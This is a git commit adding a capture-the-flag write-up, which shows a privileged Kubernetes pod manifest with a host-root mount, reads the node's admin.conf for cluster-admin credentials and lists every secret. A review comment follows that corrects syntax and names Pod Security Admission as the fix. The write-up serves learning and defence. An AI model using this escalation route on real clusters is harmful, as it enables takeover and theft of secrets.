| author | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
|---|---|---|
| committer | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
| commit | b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch) | |
| tree | 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 | /punkctf/k8s_04.md |
initial commit
Diffstat (limited to 'punkctf/k8s_04.md')
-rw-r--r-- | punkctf/k8s_04.md | 50 |
1 files changed, 50 insertions, 0 deletions
diff --git a/punkctf/k8s_04.md b/punkctf/k8s_04.md new file mode 100644 index 0000000..3212624 --- /dev/null +++ b/punkctf/k8s_04.md @@ -0,0 +1,50 @@ + +Using `kubectl auth can-i --list` we find we still can't look at secrets directly, but we can create pods now. + +These pods don't have any security policy applied, meaning there are plenty of privesc routes we can take, most of them described [here](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation). + +Here is the pod i created: + +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: everything-allowed-exec-pod + labels: + app: pentest +spec: + hostNetwork: true + hostPID: true + hostIPC: true + containers: + - name: everything-allowed-pod + image: busybox + imagePullPolicy: IfNotPresent + securityContext: + privileged: true + volumeMounts: + - mountPath: /host + name: noderoot + command: [ "/bin/sh", "-c", "--" ] + args: [ "while true; do sleep 30; done;" ] + volumes: + - name: noderoot + hostPath: + path: / +``` + +We can then `kubectl exec -it pod/everything-allowed-exec-pod sh` and explore the host filesystem at `/host`. + +Looking in `/host/etc/kubernetes/admin.conf` (the standard location for the cluster admin config), we get connection details to login as cluster admin: + +``` +users: +- name: kubernetes-admin + user: + client-certificate-data: <long base64 string> + client-key-data: <long base64 string> +``` + +We put this in our terminals `.kube/config`, and use it to enumerate the secrets with `kubectl get secret -A` + +We find a secret in the `kube-system` namespace, from which we get the flag `punk_{3WPF4FB37UMJV31D}` |
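Review bot: the exec line `kubectl exec -it pod/everything-allowed-exec-pod sh` omits the `--` separator before the command; kubectl has deprecated that form and warns about it, so `kubectl exec -it pod/everything-allowed-exec-pod -- sh` is the form to document. Two small wording fixes in the same hunk: "the pod i created" should read "the pod I created", and "our terminals `.kube/config`" should be "our terminal's `.kube/config`". Since the writeup states that "these pods don't have any security policy applied", it would help readers to name the control that closes this route: the manifest relies on `privileged: true`, `hostNetwork`, `hostPID`, `hostIPC` and a `hostPath` mount of `/`, every one of which is rejected by the Pod Security Standards baseline level, so enforcing Pod Security Admission (or an equivalent admission policy) on the namespace would block this pod even though the account holds pod-create rights. It is also worth noting that `/etc/kubernetes/admin.conf` is where kubeadm writes the cluster-admin kubeconfig, which is why any workload that can read the node filesystem can escalate to full cluster admin, and why pod create permission should be treated as equivalent to node access wherever that policy is absent.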